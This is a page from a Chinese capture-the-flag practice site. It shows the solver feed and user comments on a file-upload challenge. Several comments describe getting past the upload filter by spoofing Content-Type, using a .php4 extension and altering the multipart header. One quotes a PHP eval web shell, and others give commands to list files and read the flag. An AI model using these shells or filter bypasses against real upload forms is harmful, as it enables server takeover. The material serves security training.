评分(22)
解题动态
weifengfmian 攻破了该题 2小时前
密炉 攻破了该题 9小时前
新约定 攻破了该题 9小时前
william5678 攻破了该题 18小时前
xiniannian 攻破了该题 22小时前
微笑刺客 攻破了该题 1天前
sqw 攻破了该题 1天前
zhckwinggs 攻破了该题 2天前
学了就费 攻破了该题 5天前
shengood 攻破了该题 6天前
初学者321 攻破了该题 9天前
fish12138 攻破了该题 9天前
xxhacker 攻破了该题 9天前
kkaasdasASD 攻破了该题 10天前
Lapis 攻破了该题 10天前
qfead 攻破了该题 10天前
007li 攻破了该题 10天前
叙永 攻破了该题 10天前
neuro_evil 攻破了该题 10天前
评论
爱喝畅汁 1月前
举报
随便一张图片,用记事本打开写入一句话木马,上传之后点击提交时抓包,抓包之后修改三处:1.Content-Type 修改为:image/jpeg 2.文件名后缀修改为:php4 3.head头修改为Multipart/form-data,放行之后图片就成功上传了,再使用蚁剑进行连接即可
是小白鸭 2月前
举报
方法分享:1.php内容:<?php eval($_REQUEST[cmd]);?>。2.绕过。3.运行php寻找flag位置,url?cmd=print_r(scandir['.']); 。4.发现flag文件,url?cmd=echo file_get_contents('../../../../flag'); 。初学者的一点小分享:)
李逍遥逛霍格沃茨 3月前
举报
能不能退金币 真被恶心到了
李逍遥逛霍格沃茨 3月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
李逍遥逛霍格沃茨 3月前
举报
纯坑金币的垃圾题目,改了上传成功但是蚁剑连不上,返回数据为空
yuxuanlve 4月前
举报
为什么蚁剑死活连不上啊,改该的都改了啊,哥斯拉也连不上,评论全都看了一遍也没找到解决方案😭
ctfcaiji9527 4月前
举报
发现个问题,用yakit死活传不上去,用BP就行。( ╯□╰ )
jetxi 6月前
举报
php4和类型修改就可以绕过,可以放命令执行,或者直接蚁剑连,flag在根目录 data={'pass':"system('cat /flag');"}
desireart 7月前
举报
不知道,也没啥用,这种事情知道再多也没用,这辈子都知道不完
kaiyafanfan123 8月前
举报
而且正常图片上传,multipart/form-data 就合适